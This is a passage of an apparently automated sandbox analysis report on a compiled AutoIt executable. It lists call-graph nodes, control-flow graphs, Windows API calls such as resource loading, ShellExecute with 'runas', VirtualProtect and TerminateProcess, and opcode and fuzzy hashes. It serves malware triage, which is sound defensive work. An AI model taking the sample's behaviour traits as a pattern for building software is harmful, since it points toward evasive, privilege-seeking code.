95446->95455 95456 1009d40 VirtualFree 95446->95456 95458 100aa40 GetPEB 95446->95458 95448 1009c00 CreateFileW 95448->95446 95448->95454 95450 1009c4a ReadFile 95449->95450 95449->95454 95453 1009c68 VirtualAlloc 95450->95453 95450->95454 95451 1009e2a 95451->95443 95452 1009e1c VirtualFree 95452->95451 95453->95446 95453->95454 95454->95451 95454->95452 95455->95446 95456->95446 95457->95443 95459 100aa6a 95458->95459 95459->95448 95460 3fbb64 95461 3fbb77 95460->95461 95462 3fbb71 95460->95462 95464 3d1c9d _free 47 API calls 95461->95464 95465 3fbb88 95461->95465 95463 3d1c9d _free 47 API calls 95462->95463 95463->95461 95464->95465 95466 3d1c9d _free 47 API calls 95465->95466 95467 3fbb9a 95465->95467 95466->95467 95468 429bec 95506 3c0ae0 Mailbox ___crtGetEnvironmentStringsW 95468->95506 95473 3c0509 95526 3fcc5c 86 API calls 4 library calls 95473->95526 95474 3c146e 95480 3b6eed 48 API calls 95474->95480 95475 3c1d10 59 API calls 95499 3bfec8 95475->95499 95476 3cf4ea 48 API calls 95476->95499 95478 3b6eed 48 API calls 95478->95499 95479 3c1473 95525 3fcc5c 86 API calls 4 library calls 95479->95525 95497 3bffe1 Mailbox 95480->95497 95481 42a922 95483 42a246 95486 3b6eed 48 API calls 95483->95486 95486->95497 95487 42a873 95488 3bd7f7 48 API calls 95488->95499 95489 42a30e 95489->95497 95521 3e97ed InterlockedDecrement 95489->95521 95490 3bce19 48 API calls 95490->95506 95492 3e97ed InterlockedDecrement 95492->95499 95493 42a973 95527 3fcc5c 86 API calls 4 library calls 95493->95527 95495 3d0f0a 52 API calls __cinit 95495->95499 95496 42a982 95498 3c15b5 95524 3fcc5c 86 API calls 4 library calls 95498->95524 95499->95473 95499->95474 95499->95475 95499->95476 95499->95478 95499->95479 95499->95483 95499->95488 95499->95489 95499->95492 95499->95493 95499->95495 95499->95497 95499->95498 95516 3c1820 331 API calls 2 library calls 95499->95516 95501 3bfe30 331 API calls 95501->95506 95502 42a706 95522 3fcc5c 86 API calls 4 library calls 95502->95522 95504 3c1526 Mailbox 95523 3fcc5c 86 API calls 4 library calls 95504->95523 95505 3cf4ea 48 API calls 95505->95506 95506->95490 95506->95497 95506->95499 95506->95501 95506->95502 95506->95504 95506->95505 95507 3e97ed InterlockedDecrement 95506->95507 95510 410d1d 95506->95510 95513 410d09 95506->95513 95517 40ef61 82 API calls 2 library calls 95506->95517 95518 40f0ac 90 API calls Mailbox 95506->95518 95519 3fa6ef 48 API calls 95506->95519 95520 40e822 331 API calls Mailbox 95506->95520 95507->95506 95528 40f8ae 95510->95528 95512 410d2d 95512->95506 95514 40f8ae 129 API calls 95513->95514 95515 410d19 95514->95515 95515->95506 95516->95499 95517->95506 95518->95506 95519->95506 95520->95506 95521->95497 95522->95504 95523->95497 95524->95497 95525->95487 95526->95481 95527->95496 95529 3b936c 81 API calls 95528->95529 95530 40f8ea 95529->95530 95553 40f92c Mailbox 95530->95553 95564 410567 95530->95564 95532 40fb8b 95533 40fcfa 95532->95533 95538 40fb95 95532->95538 95600 410688 89 API calls Mailbox 95533->95600 95536 40fd07 95537 40fd13 95536->95537 95536->95538 95537->95553 95577 40f70a 95538->95577 95539 3b936c 81 API calls 95549 40f984 Mailbox 95539->95549 95544 40fbc9 95591 3ced18 95544->95591 95547 40fbe3 95597 3fcc5c 86 API calls 4 library calls 95547->95597 95548 40fbfd 95551 3cc050 48 API calls 95548->95551 95549->95532 95549->95539 95549->95553 95595 4129e8 48 API calls ___crtGetEnvironmentStringsW 95549->95595 95596 40fda5 60 API calls 2 library calls 95549->95596 95554 40fc14 95551->95554 95552 40fbee GetCurrentProcess TerminateProcess 95552->95548 95553->95512 95555 3c1b90 48 API calls 95554->95555 95563 40fc3e 95554->95563 95556 40fc2d 95555->95556 95598 41040f 105 API calls _free 95556->95598 95557 40fd65 95557->95553 95560 40fd7e FreeLibrary 95557->95560 95559 3c1b90 48 API calls 95559->95563 95560->95553 95563->95557 95563->95559 95599 3bdcae 50 API calls Mailbox 95563->95599 95601 41040f 105 API calls _free 95563->95601 95565 3bbdfa 48 API calls 95564->95565 95566 410582 CharLowerBuffW 95565->95566 95602 3f1f11 95566->95602 95570 3bd7f7 48 API calls 95571 4105bb 95570->95571 95609 3b69e9 48 API calls ___crtGetEnvironmentStringsW 95571->95609 95573 4105d2 95574 3bb18b 48 API calls 95573->95574 95575 4105de Mailbox 95574->95575 95576 41061a Mailbox 95575->95576 95610 40fda5 60 API calls 2 library calls 95575->95610 95576->95549 95578 40f725 95577->95578 95579 40f77a 95577->95579 95580 3cf4ea 48 API calls 95578->95580 95583 410828 95579->95583 95582 40f747 95580->95582 95581 3cf4ea 48 API calls 95581->95582 95582->95579 95582->95581 95584 410a53 Mailbox 95583->95584 95590 41084b _strcat _wcscpy __NMSG_WRITE 95583->95590 95584->95544 95585 3bcf93 58 API calls 95585->95590 95586 3bd286 48 API calls 95586->95590 95587 3b936c 81 API calls 95587->95590 95588 3d395c 47 API calls __crtCompareStringA_stat 95588->95590 95590->95584 95590->95585 95590->95586 95590->95587 95590->95588 95613 3f8035 50 API calls __NMSG_WRITE 95590->95613 95593 3ced2d 95591->95593 95592 3cedc5 VirtualProtect 95594 3ced93 95592->95594 95593->95592 95593->95594 95594->95547 95594->95548 95595->95549 95596->95549 95597->95552 95598->95563 95599->95563 95600->95536 95601->95563 95604 3f1f3b __NMSG_WRITE 95602->95604 95603 3f1f79 95603->95570 95603->95575 95604->95603 95605 3f1f6f 95604->95605 95606 3f1ffa 95604->95606 95605->95603 95611 3cd37a 60 API calls 95605->95611 95606->95603 95612 3cd37a 60 API calls 95606->95612 95609->95573 95610->95576 95611->95605 95612->95606 95613->95590 95614 4219dd 95619 3b4a30 95614->95619 95616 4219f1 95639 3d0f0a 52 API calls __cinit 95616->95639 95618 4219fb 95620 3b4a40 __ftell_nolock 95619->95620 95621 3bd7f7 48 API calls 95620->95621 95622 3b4af6 95621->95622 95623 3b5374 50 API calls 95622->95623 95624 3b4aff 95623->95624 95640 3b363c 95624->95640 95627 3b518c 48 API calls 95628 3b4b18 95627->95628 95629 3b64cf 48 API calls 95628->95629 95630 3b4b29 95629->95630 95631 3bd7f7 48 API calls 95630->95631 95632 3b4b32 95631->95632 95646 3b49fb 95632->95646 95634 3b61a6 48 API calls 95638 3b4b3d _wcscat Mailbox __NMSG_WRITE 95634->95638 95635 3b4b43 Mailbox 95635->95616 95636 3bce19 48 API calls 95636->95638 95637 3b64cf 48 API calls 95637->95638 95638->95634 95638->95635 95638->95636 95638->95637 95639->95618 95641 3b3649 __ftell_nolock 95640->95641 95660 3b366c GetFullPathNameW 95641->95660 95643 3b365a 95644 3b6a63 48 API calls 95643->95644 95645 3b3669 95644->95645 95645->95627 95662 3bbcce 95646->95662 95649 3b4a2b 95649->95638 95650 4241cc RegQueryValueExW 95651 424246 RegCloseKey 95650->95651 95652 4241e5 95650->95652 95653 3cf4ea 48 API calls 95652->95653 95654 4241fe 95653->95654 95655 3b47b7 48 API calls 95654->95655 95656 424208 RegQueryValueExW 95655->95656 95657 424224 95656->95657 95658 42423b 95656->95658 95659 3b6a63 48 API calls 95657->95659 95658->95651 95659->95658 95661 3b368a 95660->95661 95661->95643 95663 3bbce8 95662->95663 95667 3b4a0a RegOpenKeyExW 95662->95667 95664 3cf4ea 48 API calls 95663->95664 95665 3bbcf2 95664->95665 95666 3cee75 48 API calls 95665->95666 95666->95667 95667->95649 95667->95650

                                                                                Executed Functions

                                                                                Function 003DB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 745 3db043-3db080 call 3df8a0 748 3db089-3db08b 745->748 749 3db082-3db084 745->749 751 3db08d-3db0a7 call 3d7bda call 3d7c0e call 3d6e10 748->751 752 3db0ac-3db0d9 748->752 750 3db860-3db86c call 3da70c 749->750 751->750 754 3db0db-3db0de 752->754 755 3db0e0-3db0e7 752->755 754->755 758 3db10b-3db110 754->758 759 3db0e9-3db100 call 3d7bda call 3d7c0e call 3d6e10 755->759 760 3db105 755->760 763 3db11f-3db12d call 3e3bf2 758->763 764 3db112-3db11c call 3df82f 758->764 788 3db851-3db854 759->788 760->758 775 3db44b-3db45d 763->775 776 3db133-3db145 763->776 764->763 779 3db7b8-3db7d5 WriteFile 775->779 780 3db463-3db473 775->780 776->775 778 3db14b-3db183 call 3d7a0d GetConsoleMode 776->778 778->775 801 3db189-3db18f 778->801 782 3db7d7-3db7df 779->782 783 3db7e1-3db7e7 GetLastError 779->783 785 3db479-3db484 780->785 786 3db55a-3db55f 780->786 789 3db7e9 782->789 783->789 793 3db81b-3db833 785->793 794 3db48a-3db49a 785->794 790 3db565-3db56e 786->790 791 3db663-3db66e 786->791 800 3db85e-3db85f 788->800 798 3db7ef-3db7f1 789->798 790->793 799 3db574 790->799 791->793 797 3db674 791->797 795 3db83e-3db84e call 3d7c0e call 3d7bda 793->795 796 3db835-3db838 793->796 802 3db4a0-3db4a3 794->802 795->788 796->795 803 3db83a-3db83c 796->803 804 3db67e-3db693 797->804 806 3db856-3db85c 798->806 807 3db7f3-3db7f5 798->807 808 3db57e-3db595 799->808 800->750 809 3db199-3db1bc GetConsoleCP 801->809 810 3db191-3db193 801->810 811 3db4e9-3db520 WriteFile 802->811 812 3db4a5-3db4be 802->812 803->800 816 3db699-3db69b 804->816 806->800 807->793 818 3db7f7-3db7fc 807->818 819 3db59b-3db59e 808->819 820 3db440-3db446 809->820 821 3db1c2-3db1ca 809->821 810->775 810->809 811->783 815 3db526-3db538 811->815 813 3db4cb-3db4e7 812->813 814 3db4c0-3db4ca 812->814 813->802 813->811 814->813 815->798 823 3db53e-3db54f 815->823 824 3db69d-3db6b3 816->824 825 3db6d8-3db719 WideCharToMultiByte 816->825 827 3db7fe-3db810 call 3d7c0e call 3d7bda 818->827 828 3db812-3db819 call 3d7bed 818->828 829 3db5de-3db627 WriteFile 819->829 830 3db5a0-3db5b6 819->830 820->807 822 3db1d4-3db1d6 821->822 831 3db1dc-3db1fe 822->831 832 3db36b-3db36e 822->832 823->794 833 3db555 823->833 834 3db6b5-3db6c4 824->834 835 3db6c7-3db6d6 824->835 825->783 837 3db71f-3db721 825->837 827->788 828->788 829->783 842 3db62d-3db645 829->842 839 3db5cd-3db5dc 830->839 840 3db5b8-3db5ca 830->840 845 3db217-3db223 call 3d1688 831->845 846 3db200-3db215 831->846 847 3db375-3db3a2 832->847 848 3db370-3db373 832->848 833->798 834->835 835->816 835->825 849 3db727-3db75a WriteFile 837->849 839->819 839->829 840->839 842->798 844 3db64b-3db658 842->844 844->808 851 3db65e 844->851 866 3db269-3db26b 845->866 867 3db225-3db239 845->867 852 3db271-3db283 call 3e40f7 846->852 854 3db3a8-3db3ab 847->854 848->847 848->854 855 3db75c-3db776 849->855 856 3db77a-3db78e GetLastError 849->856 851->798 876 3db289 852->876 877 3db435-3db43b 852->877 859 3db3ad-3db3b0 854->859 860 3db3b2-3db3c5 call 3e5884 854->860 855->849 862 3db778 855->862 864 3db794-3db796 856->864 859->860 868 3db407-3db40a 859->868 860->783 880 3db3cb-3db3d5 860->880 862->864 864->789 865 3db798-3db7b0 864->865 865->804 871 3db7b6 865->871 866->852 873 3db23f-3db254 call 3e40f7 867->873 874 3db412-3db42d 867->874 868->822 872 3db410 868->872 871->798 872->877 873->877 887 3db25a-3db267 873->887 874->877 878 3db28f-3db2c4 WideCharToMultiByte 876->878 877->789 878->877 883 3db2ca-3db2f0 WriteFile 878->883 881 3db3fb-3db401 880->881 882 3db3d7-3db3ee call 3e5884 880->882 881->868 882->783 890 3db3f4-3db3f5 882->890 883->783 886 3db2f6-3db30e 883->886 886->877 889 3db314-3db31b 886->889 887->878 889->881 891 3db321-3db34c WriteFile 889->891 890->881 891->783 892 3db352-3db359 891->892 892->877 893 3db35f-3db366 892->893 893->881
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 808b7f12edb009db1ee57083d95c60664adc1454a17e1cf78d7cd6050687d5bd
                                                                                • Instruction ID: aaa0a8c270004f62963632c1194b70ce70a918cee941164ccd2f8e1718bf4dc2
                                                                                • Opcode Fuzzy Hash: 808b7f12edb009db1ee57083d95c60664adc1454a17e1cf78d7cd6050687d5bd
                                                                                • Instruction Fuzzy Hash: 05324D76A02269CBCB26CF15EC416E9B7B5FF46310F5641DAE40AA7B81D7309E80CF52
                                                                                Function 003B3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003B3AA3,?), ref: 003B3D45
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,003B3AA3,?), ref: 003B3D57
                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00471148,00471130,?,?,?,?,003B3AA3,?), ref: 003B3DC8
                                                                                  • Part of subcall function 003B6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003B3DEE,00471148,?,?,?,?,?,003B3AA3,?), ref: 003B6471
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,003B3AA3,?), ref: 003B3E48
                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004628F4,00000010), ref: 00421CCE
                                                                                • SetCurrentDirectoryW.KERNEL32(?,00471148,?,?,?,?,?,003B3AA3,?), ref: 00421D06
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0044DAB4,00471148,?,?,?,?,?,003B3AA3,?), ref: 00421D89
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,003B3AA3), ref: 00421D90
                                                                                  • Part of subcall function 003B3E6E: GetSysColorBrush.USER32(0000000F), ref: 003B3E79
                                                                                  • Part of subcall function 003B3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 003B3E88
                                                                                  • Part of subcall function 003B3E6E: LoadIconW.USER32(00000063), ref: 003B3E9E
                                                                                  • Part of subcall function 003B3E6E: LoadIconW.USER32(000000A4), ref: 003B3EB0
                                                                                  • Part of subcall function 003B3E6E: LoadIconW.USER32(000000A2), ref: 003B3EC2
                                                                                  • Part of subcall function 003B3E6E: RegisterClassExW.USER32(?), ref: 003B3F30
                                                                                  • Part of subcall function 003B36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003B36E6
                                                                                  • Part of subcall function 003B36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003B3707
                                                                                  • Part of subcall function 003B36B8: ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B371B
                                                                                  • Part of subcall function 003B36B8: ShowWindow.USER32(00000000,?,?,?,?,003B3AA3,?), ref: 003B3724
                                                                                  • Part of subcall function 003B4FFC: _memset.LIBCMT ref: 003B5022
                                                                                  • Part of subcall function 003B4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B50CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                • String ID: ()F$This is a third-party compiled AutoIt script.$runas
                                                                                • API String ID: 438480954-192899200
                                                                                • Opcode ID: 85e340ace78b410d15b09136ca2677746a50fd3e45f4cd67e2d59314e48c7166
                                                                                • Instruction ID: 89162ee52257a5118e37ca5179ba039f820ccc663d7acb9d45dbdbdaa3e86ed6
                                                                                • Opcode Fuzzy Hash: 85e340ace78b410d15b09136ca2677746a50fd3e45f4cd67e2d59314e48c7166
                                                                                • Instruction Fuzzy Hash: 37514A31E04254AACF13ABB8EC42EED7B79EF18708F404036F7056A5A2DB784A45C725
                                                                                Function 003CDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1080 3cddc0-3cde4f call 3bd7f7 GetVersionExW call 3b6a63 call 3cdfb4 call 3b6571 1089 3cde55-3cde56 1080->1089 1090 4224c8-4224cb 1080->1090 1093 3cde58-3cde63 1089->1093 1094 3cde92-3cdea2 call 3cdf77 1089->1094 1091 4224e4-4224e8 1090->1091 1092 4224cd 1090->1092 1096 4224d3-4224dc 1091->1096 1097 4224ea-4224f3 1091->1097 1095 4224d0 1092->1095 1098 3cde69-3cde6b 1093->1098 1099 42244e-422454 1093->1099 1107 3cdea4-3cdec1 GetCurrentProcess call 3cdf5f 1094->1107 1108 3cdec7-3cdee1 1094->1108 1095->1096 1096->1091 1097->1095 1104 4224f5-4224f8 1097->1104 1105 422469-422475 1098->1105 1106 3cde71-3cde74 1098->1106 1102 422456-422459 1099->1102 1103 42245e-422464 1099->1103 1102->1094 1103->1094 1104->1096 1109 422477-42247a 1105->1109 1110 42247f-422485 1105->1110 1111 3cde7a-3cde89 1106->1111 1112 422495-422498 1106->1112 1107->1108 1131 3cdec3 1107->1131 1114 3cdf31-3cdf3b GetSystemInfo 1108->1114 1115 3cdee3-3cdef7 call 3ce00c 1108->1115 1109->1094 1110->1094 1116 3cde8f 1111->1116 1117 42248a-422490 1111->1117 1112->1094 1118 42249e-4224b3 1112->1118 1120 3cdf0e-3cdf1a 1114->1120 1128 3cdf29-3cdf2f GetSystemInfo 1115->1128 1129 3cdef9-3cdf01 call 3cdff4 GetNativeSystemInfo 1115->1129 1116->1094 1117->1094 1122 4224b5-4224b8 1118->1122 1123 4224bd-4224c3 1118->1123 1124 3cdf1c-3cdf1f FreeLibrary 1120->1124 1125 3cdf21-3cdf26 1120->1125 1122->1094 1123->1094 1124->1125 1130 3cdf03-3cdf07 1128->1130 1129->1130 1130->1120 1134 3cdf09-3cdf0c FreeLibrary 1130->1134 1131->1108 1134->1120
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 003CDDEC
                                                                                • GetCurrentProcess.KERNEL32(00000000,0044DC38,?,?), ref: 003CDEAC
                                                                                • GetNativeSystemInfo.KERNELBASE(?,0044DC38,?,?), ref: 003CDF01
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 003CDF0C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 003CDF1F
                                                                                • GetSystemInfo.KERNEL32(?,0044DC38,?,?), ref: 003CDF29
                                                                                • GetSystemInfo.KERNEL32(?,0044DC38,?,?), ref: 003CDF35
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                • String ID:
                                                                                • API String ID: 3851250370-0
                                                                                • Opcode ID: 6634190e1e9435613bb009e232d94ca56752297f83a71bc57bc37712395f3740
                                                                                • Instruction ID: a9431c673f9370bf8733165cb5468ee4a294899ded69d5eeb97f74f02f5b2da7
                                                                                • Opcode Fuzzy Hash: 6634190e1e9435613bb009e232d94ca56752297f83a71bc57bc37712395f3740
                                                                                • Instruction Fuzzy Hash: 8C61D4B190A394DFCF16DF6898C16EA7FB46F29300B1945EDE8859F207C664C908CB69
                                                                                Function 003B406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1152 3b406b-3b4083 CreateStreamOnHGlobal 1153 3b40a3-3b40a6 1152->1153 1154 3b4085-3b409c FindResourceExW 1152->1154 1155 424f16-424f25 LoadResource 1154->1155 1156 3b40a2 1154->1156 1155->1156 1157 424f2b-424f39 SizeofResource 1155->1157 1156->1153 1157->1156 1158 424f3f-424f4a LockResource 1157->1158 1158->1156 1159 424f50-424f6e 1158->1159 1159->1156
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003B449E,?,?,00000000,00000001), ref: 003B407B
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003B449E,?,?,00000000,00000001), ref: 003B4092
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,003B449E,?,?,00000000,00000001,?,?,?,?,?,?,003B41FB), ref: 00424F1A
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,003B449E,?,?,00000000,00000001,?,?,?,?,?,?,003B41FB), ref: 00424F2F
                                                                                • LockResource.KERNEL32(003B449E,?,?,003B449E,?,?,00000000,00000001,?,?,?,?,?,?,003B41FB,00000000), ref: 00424F42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: c238d5239cd865b6eb765d161825d1502745cfb2139596147181bf5b81da5e14
                                                                                • Instruction ID: 6c8949dd46c61f25db37ab5a8f0460f38a85e262bc2a3cb8d7b2cb28e5047486
                                                                                • Opcode Fuzzy Hash: c238d5239cd865b6eb765d161825d1502745cfb2139596147181bf5b81da5e14
                                                                                • Instruction Fuzzy Hash: 42117970600701BFE7229B26EC48F67BBB9EBC5B55F20857CF612966A0DB71DC048A25
                                                                                Function 003F6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00422F49), ref: 003F6CB9
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003F6CCA
                                                                                • FindClose.KERNEL32(00000000), ref: 003F6CDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                • String ID:
                                                                                • API String ID: 48322524-0
                                                                                • Opcode ID: cd52ddf7e5c1bf83b58bc077c042581b14ee7c233762d21a70b63d1b99a5a117
                                                                                • Instruction ID: afebe4815fa79a7b8824f172cc405498465b119ccc03506f84aae5d1b8a956f4
                                                                                • Opcode Fuzzy Hash: cd52ddf7e5c1bf83b58bc077c042581b14ee7c233762d21a70b63d1b99a5a117
                                                                                • Instruction Fuzzy Hash: 76E0D831C144155786146738FC0E4F9376CDA05339F100725F5B1C11D0EB74D90046D9
                                                                                Function 003BE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BE959
                                                                                • timeGetTime.WINMM ref: 003BEBFA
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003BED2E
                                                                                • TranslateMessage.USER32(?), ref: 003BED3F
                                                                                • DispatchMessageW.USER32(?), ref: 003BED4A
                                                                                • LockWindowUpdate.USER32(00000000), ref: 003BED79
                                                                                • DestroyWindow.USER32 ref: 003BED85
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003BED9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 00425270
                                                                                • TranslateMessage.USER32(?), ref: 004259F7
                                                                                • DispatchMessageW.USER32(?), ref: 00425A05
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00425A19
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                • API String ID: 2641332412-570651680
                                                                                • Opcode ID: c59daaf686d80940ffd0fc3a784d0c85e78dea3e25f3532420c77aab1e3cc9c1
                                                                                • Instruction ID: fa79956a8d42684f36bf61d94ee99e08964d52005ec4a5c964e625174cb75874
                                                                                • Opcode Fuzzy Hash: c59daaf686d80940ffd0fc3a784d0c85e78dea3e25f3532420c77aab1e3cc9c1
                                                                                • Instruction Fuzzy Hash: 4162B470608340DFDB25DF28D885BEA77E4BF44308F44497EEA4A8B692DB74D848CB56
                                                                                Function 003E5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___createFile.LIBCMT ref: 003E5EC3
                                                                                • ___createFile.LIBCMT ref: 003E5F04
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003E5F2D
                                                                                • __dosmaperr.LIBCMT ref: 003E5F34
